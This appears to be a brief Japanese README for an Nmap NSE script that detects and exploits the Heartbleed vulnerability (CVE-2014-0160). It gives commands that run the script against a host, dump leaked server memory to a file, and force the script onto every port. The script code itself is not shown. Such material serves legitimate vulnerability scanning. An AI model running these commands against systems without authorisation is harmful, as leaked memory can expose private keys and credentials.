
Heartbleed/CVE-2014-0160を発見/悪用するNmap NSEスクリプト
Heartbleed/CVE-2014-0160 を発見・悪用する Nmap NSE スクリプトです。このスクリプトは現在、基本的に Patrik Karlsson が書いたものに、私自身のスクリプトから移植した小さな変更を加えたものです。
これはすべての SSL、FTP、SMTP、XMPP ポートで実行されます。
$ nmap --script ./openssl-heartbleed.nse host.tld
漏洩したメモリのダンプは、-d フラグで Nmap のデバッグレベルを上げることで有効になります。
$ nmap -d --script=./openssl-heartbleed.nse host.tld
$ nmap --script ./ssl-heartbleed.nse --script-args 'ssl-heartbleed.dumpfile=/tmp/heartbleed.dump' host.tld
サービスが検出されたかどうかに関わらず、すべてのポートでスクリプトを強制的に実行します。
$ nmap --script +./ssl-heartbleed.nse host.tld